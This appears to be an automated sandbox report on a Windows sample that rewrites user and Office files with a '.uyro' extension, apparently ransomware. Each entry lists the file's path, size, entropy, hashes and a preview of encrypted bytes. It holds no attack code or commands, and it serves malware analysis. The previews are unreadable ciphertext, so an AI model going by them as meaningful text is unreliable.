Preview:	<?xml.....Bl..n..\....).$#..Z.oM......v......c..ws.{AhO..7<].........V.>j5q..u.!.W.[.gf..J..=......S.q/).".....e)%.W_.r(..s.c.xs..[W........KIq..x2..,...4.+...c...VRz..$..s.=..i.(.d...>K..j...Z.as.]/.u.J..b3...0.p....)."w!.B...A.T...h].Qj.uE........G....B]`.1..g..3......:\h7y...>..j.tr.r#?G5.. \|fY.. I..n..x..I.I..XW0M.p^......b.D...K.... ..6......:@.n.6.X...f...t>NU...F.6..........f.f..ke+.@x.....(71.3BE...Q...p...`I.5..!.PA\..Xqz,...?./h..#R.....A...Z...f..>]..m.......S....H.....TI..o.9..].t2.......%.<!....V.!..k._,..Aq.Q.7.......N...^.#.U..2...s.sp..0R.V..C.......:Q...........M............4.........#..4v...L..;i....Lcr.f.}...W.\.......!......j.1.._...g.S.!j+P....V.g.oZ...=.p..u...EPb.=\P........z......5I..RKB.B..&.C.8.m .B..f\|nw..05t.W....0_..V..6g..M.k...`...0@$......dc.4.{+...j.[.;Im.".....!.....a.Uc!.h.........1{Jbj3..J.(....`....>#.. .n."z.\......=.H..y.......u.:~....ka..l.....^.Ws.JjB#.;s..C.1.;.+..:6.........B.2...4...o./*M.,

C:\Users\user\Application Data\Microsoft\Bibliography\Style\MLASeventhEditionOfficeOnline.xsl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	255553
Entropy (8bit):	7.397358409432278
Encrypted:	false
SSDEEP:	6144:Edzr8FSqI3N2Vt5xGusR0BenzoAoeCLZXUKXO8hXUL+XxqXr8QLFXMsqj7s5DDME:If8FSqI92f5xGsBkkcZ
MD5:	5DF3AFD88D8A851F4FC59263224DDC75
SHA1:	705A395244AFA41FF406C5AAD3BFA3D3C6A33983
SHA-256:	6FF4E441C93EDE6225743D76C3426675D871EAC888E93576CBBEDF6103E8B8E1
SHA-512:	DA842EC3B2E1B13FC75F5A50A1AAB6D9C5AB014D91B5FD6A4493E0FC5C14E95D5DD93B435487994A83BC8AEA9F7D8D629B65F4CD599E7BC8D554411A78896DA8
Malicious:	false
Reputation:	unknown
Preview:	<?xmlqG......2..Y%..5`I.Z#.;...)..HMnP.[#[[...hJ.]..3S...a$....x..V..-...t....?..l..#...c....!L.%O.z..`R...........G...6aw.4.....\|Q6.._......O..\|p..N..8..1.J.4!..!..x..t2...4)...0V.=:........y{.er.. K..>.s.P.$.:.......(,.Do:..do.I...\...$om.=S.3#.}P..u....H..m..]...wb`D.2.\|...8dJ.4B......Q5.1z....?..L....b.....-...~....G0C-K.....nP..E.3.6.......jz...&...\|.tu......(...A)X..... :k..F... j~..._^c/y.........R,$F+={-.H.../...3O2U..o.I.F.NU.a..t?..h4...'.....R_..i....A..!.........G"......... 3.<.kw...GFiR.....^..jt<`pvt.....oM.$w,..L....d].t.......Am.-B./(j9]E}$.y..B;.....{. ..`'D.c......v.b..Y.<..5.T7.......b..;v.L.7.w.....(.....).h...a...'.....b..X;........8.J.D...l...6...T).~...6....w...'.K.p....J..!...!0,?...-..K..){..jOv;.....y.......^.........<...W.[b.%S..0tu...{..0a.2.,R#Wx..W.....L.p......O....l"j.j...F.w...N.....2x....0..A.G,...__`n.y..n...J...e..bkg...lA.g....+..T/.N....?.....?..\|...{8.[...4%c......j\....?.Q.dgj....O......9f....,.....

C:\Users\user\Application Data\Microsoft\Bibliography\Style\SIST02.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	251670
Entropy (8bit):	7.427810140413259
Encrypted:	false
SSDEEP:	6144:RTqY5ydCRWQ7dwEpOtNmJ/OZKXMUw3iOMJfot1FyJS0fm2PgYuSR3Q5ntOdE4Cx6:RqY5DYkdwEwSJ/O4
MD5:	AE0BBB59C8FACA271B260BFFF7850726
SHA1:	2E516552DD18F1AAF9C12486E0D4273335E89325
SHA-256:	B71E362098371FF63CA9F211963CEE249361CC95F855890C37773DED4DB3E94F
SHA-512:	D917B80A5DB2323EED357EE3E7BEF7D1322D86B118177389961F1A2B2E7D6F7C85348FC657787FB8B518591A3FAD734505DC28A060D7F9607FCA15E43864F24A
Malicious:	false
Reputation:	unknown
Preview:	<?xml.....]@...d..a..o.QK../.VX...!...Aa..Tb[=$YNg.d.j...[0W....c.<s..q\.......3.....0..h........8....OP.......18.5..M.#...>Bl..CP.@.f%._0_......~LX2]..8O.r..H..L.p..3y......y4`..6..+.M......8G..$:.B.....d.?....x.gZ.2.X.C.j....=.^...x.G.ro.CE.]1.U'.4.).t...g..6\5._5.rP.... w..-h.~h...:..D.2.ic.$....$ZOQ./;.\I....m5..>......>1.Q%Uo...\......y&SD..g!.u.L..Z..>..c....F...\..mQ........~..XkJz.......u.'..;..(.k."Y...-...iA.....d#......;s........'..^.8.r3{wLW...CA.....d.qc.{~.0.....".+O.Bv....h..U....2....7.i.2......9g2.H.........?0....M.~..e}...}...;..+...w.D..R.?G.W..:\|...%...r\|..ZMv. ..#.8.d....Sk...K..:.(.W.~...../......>.`.`... ..G...Z.e...}.>_..\|.h..8M...`.........."..........2C.h\h...x..%`RW...Dl4...RwY...X..8.s=...T.{.Ho..=Y.\|.Q.........;.=..V.6..$Fu.$.Q.yb......`#...`....i.S...T...5&..Qg9.u,@.~..}.m6.^Yat0N..+....l.1.,.......J..X..E;....D.oI.-.u4..&~3....;-.. ...j.MI2..9.......M.....[...z.....1J.....l%....M$..>.Ib...zP.7....9..s..

C:\Users\user\Application Data\Microsoft\Bibliography\Style\TURABIAN.XSL.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	344996
Entropy (8bit):	6.9310676911292655
Encrypted:	false
SSDEEP:	6144:4EgPbA0VLLoN/ERSCN+InEMMv7EOMBPitjASjTQQr7IwR0TnyDk1b78plJwf33iy:4PLGrCFb
MD5:	D69F78DE52705A6B965B28B66852DBB8
SHA1:	C249C0A4CE972CF3720C2725F39BC96E522F69E1
SHA-256:	942C071B2A6A9A47E06AE3E4EB31DD753EC28327B9E4258B7F640F3769B4E4C9
SHA-512:	94BBD0C54B5D68440C6760FD00916DE45D20D16B019425B131873F69B55779FD4FCDAD1D3611068A7DCD25553BAED5FD27ABB6B2FE03F214FE0D5A6848329876
Malicious:	false
Reputation:	unknown
Preview:	<?xmlePgM......0X.Nc...n...Y.2...>..........J...^..z...].B..}..c.u...3x.0/l.HG....BX..wA..FT..3....}.D.y.T&.:!3..GMrYu...<.(.4.~.....S.V.cn.......'.Y4n...s.fj.j.$/.~+..,[....p........"$l.f.?.r.\|w..S.P...G.E.+H1.......~.$.S..IFt.j..sG...1.6...?X.....N)gLD....^K...z..L...s._.K....JO...q......... ~....X....../.+.^...(..5........m.u....G..W....% ....L....c........$}T...W..3.5U.`..{...VK..dEG..&.....Q.....RV..4zM..H.u.k..N..<.\!O/.2.).....i.c. .........J...O.... .].<&.....'.2.{..1.?M..>w..T."...q..-....z.H,....g..C...........U3.C.-A(...4f..._...O...V=.~8W.D8[y.X.d6[ms.....7..p ...._....K.q}rY.......wF..."&>....C..Y.....p....u.P..4....l?.I..^O[.U..n......z..&L.!..e.._:$3..I..`g~K.t@.....l..7O../.9d9.YMST;:`9o-..K]1d.x.Gb.4...!.x........(..(M....^..oB.@?...J...'a.H.s3pxg....w.G.w....2Zw#..H..rRy.{..:.5.^...........b..51....7.Vj...g#b.&M.}uZk.['Y].Q13#~..e....X.U.M .C........{.q.7.p.;..V.`ID...{6w.u..0..L...U.....%~<uvS.S..N...Ub...a...h.!.

C:\Users\user\Application Data\Microsoft\Office\MSO1033.acl.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	38064
Entropy (8bit):	7.995665653738566
Encrypted:	true
SSDEEP:	768:jnuA3TonMO1AfS/VzaXHdNFXcU3nJ9ZsW2+kEczsqcrmdn1yujS5xMVoK:juKMMhK/VKzFXcAr2+YAqcUor5OR
MD5:	E543FBA6F23341D10352247279AA6899
SHA1:	5CE2417E27A5B950FC0E00B7DB641CB92E1F76A4
SHA-256:	57322565444970CACB94B3BAD735D66015B67D7758B9C75F6815B7007C94D413
SHA-512:	487CCF267BE711930C66C069BE6CC04D39C85C0A0049876DF831CD13BE1C6DE8D1A3031F2C7EAA297D7B1341FA29AFFFA9D487354428BB1F25419C1A111213C2
Malicious:	true
Reputation:	unknown
Preview:	...........x.............L../J............@.9.0....io.g.5(..J.3...7.C.:.......P.=..s.^...8EW~>..2@._..b..D3\ ,.......@6x.s1...k.WZ.W......I..j.....t&..A..["a>%.C.$.:..Z.fU..8=(\JwD.C....r.h..O.....\...>~.."..7V.._...\.Z..r.........K.l.G....D0..j.Cg:,.D..llL..&..1......K...'..".].q..>b?.E_.m.c>.6.....'>..x.\...5...{.>A"3..Pi.@....XE..K.y/]a8.9...By.l...M ....m.bJ$E}..?..... $.k.S..;s.hLJ .E.Z7.^Kpj.]z..p.....g.J....-.....xRsn..V...X.....oU..../......w!......Q&.i..E.].<...z.........b.v.D...NC.....W.6Z..y.FY.4.u.X.#.#.&#r.VM3.\.}.Bv......m;.(...>..&..j.9..B..p.....b..8.....z}.j.E........r.D5d+.-.%.L...".9.T..i.....B...".)N....3z7.B..TK....Q.F..Z..OI".-)........%P-K.[.S......s.B_...G'.\.]o.v..}..r.6j..q(4.n@s\|..&....Flj.D.h..~t....6 9...m...;....~.#.r....6tU..[m...........w..dPL...p...s...0a.(..b.GH)..h.&.^..=..5..[:.....?.q..:...8^....>.....:.(.vM.\[..9md...c!.f6....=........0..S..l..E8..d...)..>...Le..........H.L..z..H...S..xg.

C:\Users\user\Application Data\Microsoft\Office\Recent\Templates.LNK.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1503
Entropy (8bit):	7.873416935732594
Encrypted:	false
SSDEEP:	24:SJ0OE9DeJg0+8LYgEyxRop2T7MjuVFG9ELhWebRYHvyY4WVtJ5V0bD:S2OE9kg0biyxRG2XMjuVsIEe4vT4WVtI
MD5:	A85F77BA45A2A3951751A2076188C501
SHA1:	7D3AB2AFC633EF3CAC9717978C10EF6FD3742DD1
SHA-256:	D565822971152F6CEE45F51011BF661D91ABC79EA22AB69ED0BD12DB07675CE9
SHA-512:	A4EE5AD975406DC2F311A08BAF1917D201A6DD991E5A21BE077369E3425CDF363B43114B32688A12D7FEECC7D01E1A69BE092030E7EA0038F609DF81C56E4767
Malicious:	false
Reputation:	unknown
Preview:	L.....@.K...../ ......JZ1.{........c...0UE.....B.L .9....t....0...'a...L....g....w.R.{.Lry.2.L..+..m.O..+p..i..B.......5........4Q.<?.<.Y...4.+......2.oY.l9\)xh.%.].4P...;.m_.8.....t.h...Y...~8.u.y&Y.D.{..V%^.zl.w..-8...e..1...?..Z1z..D..k-..[/b.^..L>.I..n'.<......3.e....R}.....a+.R.BW.g<wN...g.$........?B....,...(Oqh.f.k...^.(.)U...3..xOW....~.T;1.G.........5.....nYy....x...0.i.{0W...J....]v.yP.Y.._....l..^.l.L.H.%..\...>.Ck.l.....%f.c.....kmsKb$g..$.gI...7..1.%...;..y.m...v.\|V......T#..y...em9@..2..4[.."..Y./........<[.C!.].W.j(w.t...........*.J.._.z...._l(...E.....;J"....O....<...E.0...$.L...su..H.V...}!4..C.p..@'.......D....(.U...K<..oO..;..>._.&.P..$.....dI>...o.....0...f..9..,w......U...J.HK%"&yW.=M...y.m/.......Wc...tq.A......>OG3...-....>^.....tL.B.@.5..<(...U..@iz..^4r..Mz>~u....zoo..."p.'.F.C...._...........?7...AfJ...~c,1./7=.]..}c..n0"{..".6...R...e.H..I.Q...k....E...SO.G\|"N....5J1.E....=;X.e.C......9u.[.g[..T..%..K,t.

C:\Users\user\Application Data\Microsoft\Office\Recent\index.dat.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	362
Entropy (8bit):	7.290227327843469
Encrypted:	false
SSDEEP:	6:bw0uMongUgG8PH63fTaEZYMZyQwxsVlYbs2dr7CtDgWkK1TJiNCUzGxntHcii96Z:bwN13gZPHfwYxGlWXdu8GNwctcii9a
MD5:	7EB392F2624CBD3841C0E975056C385E
SHA1:	26FD68690F2DC18C9C76F9EFC38122C98491567C
SHA-256:	8E7E27F0D74F5597AE3CF57D248140B453DEBD84A34E31081E7BFBAC93D47E67
SHA-512:	9040A07A2054F2F513F721DCD4D463ED053488BAFA7BE0247779948A45AF477EBD8CFF59C1EDF0A367AD7202E9D420756C393F0E9CB2266D6F0EE9183FE291D6
Malicious:	false
Reputation:	unknown
Preview:	[fold.......-..G..>L....h3.......!m.M..$..E..p;w\|...8..x\..6;..*.C#0...P.rj.]...0........p..Q.P].i:R.xO1........Z\|.6.G~B..2].bC.s...lv..B.....W.98F).........+H+.<.I..~@-%~....Xu[.V..>..4,g........H.uY.../y.e...S.....<..F. I..@.Q....}.E. y.T.5/g..Q....>..w..n...../K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Application Data\Microsoft\Templates\Normal.dotm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	18276
Entropy (8bit):	7.989215594130742
Encrypted:	false
SSDEEP:	384:2lu5SbQKz3QO8cX0QU0/gToo08XszQB7gbDCmcto:n5SbQWQO8kE0oToo5XssB4DCmcto
MD5:	168BF36A663C501BA2D62A2A0D41D521
SHA1:	D11BB727F915D870DD3622E97E3E88F42205399F
SHA-256:	69B6931FB4E2EE584D0AD9F28248CE0BDE0A542F2997CBF7097C52620B56A169
SHA-512:	80355C93229A98D1B407D969BF74A554FD16F38DA13E58C2E4A94778A09D4A7A6F51924D6D31569BA9B4F8BCCFF3DE6740C99F1C616C92DD5B4A2B4AA06CF7F4
Malicious:	false
Reputation:	unknown
Preview:	PK...........6.e.u....d....N_........R.#.j.&..j....x....\|1...0...\|...AB...{.UZ....V..)....9...+f(.F..]A...g.xU\|K..1...K+._\)zj....e-...C?..^#.....!.TP...i.=w...=.@.+...5u..c..l.E.w..uRYrN.Z.~../ v.x.......W}0.(......ae. .9B.9......CQ...B.7..p...~ ..XC....0.a..L.....-...NX.t+u......1...e2.Js.f#4tbN..........\.%a.6...<..oR.}[^P.3.@.T...#...k.%[\|...u.&.a..O...qn.qa\|...Sa.c".V....7....Q..B.tF6..!.W..%...Y.7.........:6-...1._&.Q...,..=...{^#C2...,VK.F..e..K.6..D...I.....GE.@....k..[>L..q.....3...P^.L[.Z.7#.....G.A.%..<..../...~eK.}......p.....>........&Gs..OB2,Vd.....f..m..0.i......f..4~/3.85.b.vo.@GT....q.g...d...+.p.v6.p..[...?\|.s...^K.M..Q....O....n...m/.)~.....#.......0(?s...!ts.g...m..j..xg"....%..5ny.......E.V........(.RnB.y.~65#..{.G"..Z....o......_..94[..SF{.....f....&m-c.cAw&O.=.5%..V.-4I...}y.nn......8....Ck........AKp..c.(..@Y...^.p0...........2.ef..m...^..o0.>.....T.l..n..9...u.o;-y.:.E.!W[z.{..S[.j.Fqp.,.p;... .,.hefL...1D.AuQ.

C:\Users\user\Application Data\Microsoft\Windows\Libraries\CameraRoll.library-ms.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1352
Entropy (8bit):	7.855441450104035
Encrypted:	false
SSDEEP:	24:YyONBWRgqOWvrIqvB2Rn8gKImf4gBeRrCYagDOf33oIK+ubD:hO2ChWvEqvuXmAGeRmYaYOfngD
MD5:	5C6A70538759F31004BA8448E952B722
SHA1:	906BDE064C2A285A5B301BF3083405FFFEC0C390
SHA-256:	612636BCFF137CD637B98728A7BB1B1961B5679CD954CEF686EEF5A7B89B33C3
SHA-512:	82021010DF34676C784AB9603C7F22AEF2E7B2AF9AE2453EAD788DCA8244E8F0806CC62DD10F7DAE2E5A74044AF41CF20BA7C0C47BC8C78CCC93A96E3E557187
Malicious:	false
Reputation:	unknown
Preview:	<?xmlt"..86.._..:..U.O..Uy6.VDD..:..sf02(........,HGq..UAe}M2..W.}...8wS..av.v..^.\5P.p..{m>........sp....3WB...v#$....AV._.j....u....$.Eq...H.@.........J.EZ...~.Mr9E...r..2.`,........VD...N..+...~...\.!.`....OZK.}b...C..S4..l[..z.y.../..&......9......$.xa...F...&.o/NM.Rb)...E1.....o;k...\|...U..\....c.v.-......@MS..9.......SU...B.].]..??...,....j..M..3......3[.V....n..2Y?(.FRa.S]}..=.C....".n.Y......`$..].2.\>.,F=.}...'...#..=~../\..~....N...-.[..?....@.../..I.?.O0.C\J..!.....N..4.X,q.]........"..M......e..k.Fvc.A.C...!.>..^n.&\..btH\|..W..<.G...zt+..IK.>...(I`o.?.(...lm.....ggg.-.r/.D.,..p....9$F.!U.\.4...">.W\|.....+.)R3.C.$..z...5m.Y.......c....%k...H.....4......6{W_...._..1q.<..{=..f..3....!^..b.[....`.w...v.. .[.\|J;.g..h...m.JL.......H.T.2'Z.....=.T..v..O3.....S.....)\|.....k\.x...M .....!7XMc..I...x.v_...a..>J.......ql.K{/...Q..t...2J}YY..../.c...A.E..25;a.~.O.....A.i1.;./..z.....U.\.1P.D.Q.d..X..j..)-.....+L...W.....17.mQ.S.

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Documents.library-ms.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2430
Entropy (8bit):	7.917602733050563
Encrypted:	false
SSDEEP:	48:o7zFqLOgU6KgAT1RqU00+L67MI/v+atztpbH2jinxdJgYuD:o7zFvb6KZT21Tat3bHVnxdOYW
MD5:	758ACA7D71AA6B06429CFB3C70837275
SHA1:	F75C27934EA95D34242C88B69F313E12C45F7BD8
SHA-256:	0989D716A5E30E8E35B2948195C276F0C012545DFC22AAA5B0A18B4A31A746B0
SHA-512:	04F0D9A97F0291004CBD5AD1F1C64300962CE333A724AB4B6A868A5BB883161D6F18257D67BF394D3A83C3EE66FB936FCA7F930C46872685050B84C30C21A37C
Malicious:	false
Reputation:	unknown
Preview:	<?xml.Qf..<P.........@.SH..;%..f.@+...XA..D69...ly..g..nqF...y..%.~...9.."I'..B~OH.........J..t.4Fh..3.:.p....l.m../.....:....M.6.&.m..~S.A...g.u.6.Y.....3F.w...e.....EV.!..8.{...{2.I..H......?G......C.G.b.f..,...Q.a.a.'...P..E..m.....+$.....q.z.?N....Wr....sI...$~.....!4.._s..~[.F._........_.!.. T!......X.p..rx1S.!.......(.T..~.R%.1......K...o....n.G..Y........&\|...d..n.............!6..9......)(..`.VCD.oAzF...IW..!S..g./...y.4......9..].B..AY<u.QD,..=.%\|....VX....7;...........nX..!.uL..F..,..kl....2.K..]...(.r_......h....;.......p=.C.'3..n.l...%..,...W.p.(..{.f.r#q......_...S...I.Y..i.....Lw..?..@.6%1.\..@.de.........2\.....FH...o.....5j...>.u.'N0....u&..O..H\|/.#.{..2.......\|/.....:._...L7.U?......C@...J........~.)(..R...=U..-.D.....M...z.L...[...mV#..\|.@ R.e...~6Gf7[..q~....jV.^Y{.$.=:...2N.ELpv....a.'..G.j....W....BS_.pF.......Z.....N....F+...F<\|..+..N(......<..b..7.<..]...n@t......^.pW~..vX\|.U...=g.4I...3~;Al..R.}...

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Music.library-ms.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2388
Entropy (8bit):	7.932155225210476
Encrypted:	false
SSDEEP:	48:CvO1GuxuhxNe9lnebWlK9cIaERf3NQgkHDP5i/jG/s0dTjS5L8RiSM7AcMD:51V91QGKiI5+HDxYSTTj8Ly4no
MD5:	A2D3F08A9B30A8F70AFA639A02D94A19
SHA1:	9A6ABD60204ED55098AD40D62043504426D83C14
SHA-256:	4AA9E9A99372D4A35C3BC4A079A5EF2F1E86BD7A1424A03F20E120B9E8045DE3
SHA-512:	2CD2F4F3FF66DA64FAA40076850C82E8879A65BEADFB725F15298F28DC03E436FB2CDF2FDDD12826081A306D87405B879DE35512A41E9BC8EE274486974F3132
Malicious:	false
Reputation:	unknown
Preview:	<?xml..+.=H......1....fA...g)Q..d.T.5..F..^. ...\|.Tw..S'..4............._..OX...jU!..u...pu....u.H/........V.W.q.0...8.KYf.pF..?.S.R..I.Q\...<.}..hl...l....aV'@w...}......u..0.T...:.V;M...c-.;L,8A..t.Q.}.%.u..K..#,.u[R..{..}G.x;!..'...[.P.e.z..X..Y..k....... ..RV.]:lj%...L............U.y......x.:...:T...6.....ef..[c.b.>..m.xz..B....o.4..<o.\.^K.....*qg.g....C>B...n.j..W.g%..Y.....0.D=}...&.N.9#..X.....-f......(.-...'.c.z(..w.#....;....I:[.qd.....)....7:...`.I.r.~O/.O$....'...+{..h?/eN..U...S..B.k...E...9....DT.!Ku-O....55ba..,...[w......}.(.KU.$......%hw%.b.9.#r.._...3.........xJm.>..Y.Q..H5 .....G..0..#j...&PhMB......A2Z...:~\|...y...#.,.A.AJ..NG.iAon.w....&O..8.7..&....3.i....I../..A7..9/..!w........u.55..)y.?.<....,U.......aS.t....f.~.NV<.<y.G"...8.7...W.;0tIn. .`......k..I.B.......9.uX.u..P..N.e._r..0..BA]..p$B.@~..%.+...0.$.C....G..6fB.g0.~.M4...}..I.;v........s..pa....f..?.$!..1.S.%a.Pl...V..YN...w{.0.I\|..N~.........E

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Pictures.library-ms.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2405
Entropy (8bit):	7.916132902903134
Encrypted:	false
SSDEEP:	48:37GMvB4Kct76YIM2ytVga7fAbTRBcTi1/i4pknuQzZ6BnAtyyEx/RxFpMvlRjD:L7ct76la7YbTRBPqs+b14HBBFpMvlB
MD5:	FA516B336B94E17440AA2AD047F1A7E8
SHA1:	8288689343E75BA4FCA78D41346F276EBFCD96B8
SHA-256:	169AC050B9D0C429F976395EC084DC8D0BF6EC6FCC0A657EB4C7ABA5F208A5EA
SHA-512:	81F890E22F38900F4491741BA00FF56D38E1B9DCAD05E496EF1BC2BD24A6B7B1F763B59CDF93F7D58E18940E5727C3E1015958361691C5CDC6E828D26AD09F80
Malicious:	false
Reputation:	unknown
Preview:	<?xmlL....Z.;...<.jQ..1y..t....).W..R..[>-S..6..3N...y...,$.n..MI.<t.8EXt.....kbw>.#T.H.<...r...![...C..f..&.C..6..pR.=...vqxju6S.vu......$.....c.i;oT......J..8,.......n.;s.V[..4..[;M........h..a...$...gt.YiU................gS.]...!L@r.H.....IO...l...f......U..z$Z5yo......Q.N.ER.'..x..N....A...f..S.9.X..U'1ri0..Mz...H.f5.W.'$.v.....y....TF.....,{..K...>%0/...\p%.p..k...o.....9J%..H.....=\|7.V..s.c.4.a.5.y..]..t.j......N...t._q...$._.\R.m>....Q.w.S.m.7."z...-.c...Uv....L..9D.s..).v...B..0.....<H...!.93.....T4...5...:o...P.................3.#........H....z.E\..m.....\|'.'.....0e.,r.Wm....../.<.~.&.;..o......>.;.Q6.....T......I.x.@.....W;D.jH...oQ...............'..T....z.yG..L.2.Ye.'.:.e.BDH.eh..............[.@P.p....+..7..jA.......c....f7..X.W..=.P.gf....{.....W.s:....2..3...e.o4.%xy0C.8..dF.....`..G.;EHDFu......E..w..2wc..aSC..t.5>.......3.G.Cg..S.MWi@.(..._]Y...h,...xu.<..x....0..7.....P.]%.RI,.O...jQ.Z*.t>U./ .G..6a.P.....@.\i..

C:\Users\user\Application Data\Microsoft\Windows\Libraries\Videos.library-ms.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	2416
Entropy (8bit):	7.917945483835746
Encrypted:	false
SSDEEP:	48:rWQLz8qpQl78W0Ksz5jN/CvyAyIq58dFQTPBSQo3Bj82I+3GkhfHJD:rFg4QlgW0dFRCaHIqAFZQo3Bj8t+WQPh
MD5:	E0E7A3363297716C4265EA6F608ABA7C
SHA1:	72070888AF0BB75A9C514CD544B959D76B84EF80
SHA-256:	5E2F66C927B5462F1851D0BE45A6D3E541D60D05FFC8B85FF21A60067D22F256
SHA-512:	13302B255746BA81E81B237CBAB10325871CA4A3A19561CD39F6F6CD4526FF5FB1133E64EA50F36986DE50262F0A31D050FD9CAF040A351A8358C6E5456969D7
Malicious:	false
Reputation:	unknown
Preview:	<?xml...$7U..X..5.1D3.g.f...b0-.y..kd.08..C.,qW..f.z..a...>Hr..D.....2Mh.2....U..A..6...o..F.....0.....,.f.R..\.?..q.....K.@p../.;<......4..\#.."O.........Y= d)..S...0.&.>q...\4{\md3^,..h9h.._.`....F\|..`.u...C....iP.i#`>.'....rkG....\|d.b...M.../5.8,7....i).....mFw..r^...(4...}c....%.w...!\.[...Kfb0.8...._..G.b....h.....\b...-..e.g=..#3I.>EJ.....f5..U.L..<.z.Sv..`k.!xg#...\|..K..o]..-.....k..h.f&'g[./)..f.`..+<.S.f>EuZ...O..2>\|..G..@L.-....L.tI...y..68.......}.u.!.M#.Z.e..-?...k.".e...~c.........7...;.jHxZ.wO.lwSD.....O.].\S......\|..3\..IO.!.r..e8.....,..........."Oz.p.X.L....I.....0.."..j......@S..I...:.cBG..rs......aAy..A.5a.N.A_...<..N...bm.oS.o.D.JwO...n..,......l..z;..2..(#............m....@.....X{...... ..r.#%....../.b..Z;...".s.......{j.W..~...(\OG...=..4$.k...+g...$b..v.Jil....'$.....M5...P.9V.W.{Rl.H.:.&..H.YqQ.O..1.gAO.I...x...Q\|..l<..G........0...(......I........{.,.....^.'!.4eB...o......cy.p1&...... 0....AIw.F.-bM$.

C:\Users\user\Cookies\deprecated.cookie.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	425
Entropy (8bit):	7.430366283251364
Encrypted:	false
SSDEEP:	12:ADIg4CcDf3tqwMRBLNOboq9nIn7CFDtcii9a:ADQtqfLNRqq7CFpbD
MD5:	3A8DE3DF0E4F8F238711095B5409EE40
SHA1:	18FC22B60D47C0E86A62AC8818BEE6F2B2BAB399
SHA-256:	22356A7BE7E7CACC807884F25A82FADB3B79661400D77A98D8AAB87B5C856C06
SHA-512:	FB3EA308940283394C911BDA6E2C1FAB50ED4DF9117FCC2CF6324610BC6EC2789F17C46C3F9F58E0F1B6FB3F25B5303633CCE5BE42F3ABE3F54FB8895F81E167
Malicious:	false
Reputation:	unknown
Preview:	Cooki..!."S.....K.a.Y)..uk...r.."}.6.N.....'....B.}Q.. ......k...[b.i.r.X...t.%_(..f&W'......w.@\|..;....,....?b.p......j.....)..E.\..\..9.V..:.g.+G......^.]-.X..n.p.g.....n.'...\|....4`\....I......=Y..E....=....Z^....&..........6.........M..A.K.K....b....R......&...g..OaN.....z7.....Y..K..r.Q.^.ED.........<..ex...e*...T....t...K6te1YGPnIbo4GcGOEP3iHx1cFFHBUeguxRGm3XS{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Desktop\BPMLNOBVSB.jpg

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.831156132257157
Encrypted:	false
SSDEEP:	24:mOx/gHmLONmK9wf5tg1iipb8gR7lClDg3u2gQb9zWpPo0DySSGbD:z/gHLN4frg1Bb8gRp9eob9SpPTSUD
MD5:	A1F7B366ED1888A5FCB0CD1E201F9675
SHA1:	85437B88DCA6641CC3A0C1C81F538E22E1B73582
SHA-256:	209784479EA5694294ECEF26BAC0B9D391C7B0DD79EAB464C1E62E7EA064EA3C
SHA-512:	E739E11E885082170FD609F1D9EE32670FBC878F66833BB9EEC093830342AA5EB84927FD0C3402A413D1D5A36152AE375ADC230BD706E40FA6D5361D1AD55146
Malicious:	true
Reputation:	unknown
Preview:	BPMLN..(i...CB..#.\|h_.IN..z...(.@uh....0.Oc.X0Wx.Z;.]%J.CO.......bse..%}..r...m.E..:nA0o..5>jp...p.....q...$x...q/e.^../..I.l..:.$._.R..G...^.:..9..~..mc..._...w.9~[......f..D?.+.2...O..(..%..~.p..iaGSm2.n.....\|#N.........!..c.........G0R...].)......E...\|.t.w...H.R...._R-..x..<....WK..RR.rY.:.....E.iC.^Am#....=........u....>=G~ZhL..S...i.?..z.......+..^../;.N.q}.u.d2"aU.mR?...PDep.U....Q....a.hOsq..W...xG..4....;.....gx.>.&.l...Hn..Jh...]$...Y...h.Y..%..oSF.t.Q..2...ez..v.a)."..`^.%:..$p..+.....Z.=.Ju..'%..:.n.U...A...6.z...9$..5../.[><._I.rV7.......(.G. ....~..O.E.....}...oB3...h.a..O...z..\|.....{.1...R6.?...h_... /.......>.X......gHMp.7{K.-v]..[o{KYc.........A...9......A.\|.......hA.ZH.>{.........w:.. ....>]B=.K).....R........#0..BgLM..f.e..J..Jzb.k.....Q.........,..0.)Y].s.......]O.>....!...Xn...7m....[..t...({..5R5#Y%t.oAKS......P......o'[.^T9..^x4..hon.]M..Ub..R..+...L2g].K'(.......6..l.o.LI.OM,....y..C...'...`.Y,(Aw.N...

C:\Users\user\Desktop\BPMLNOBVSB.jpg.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
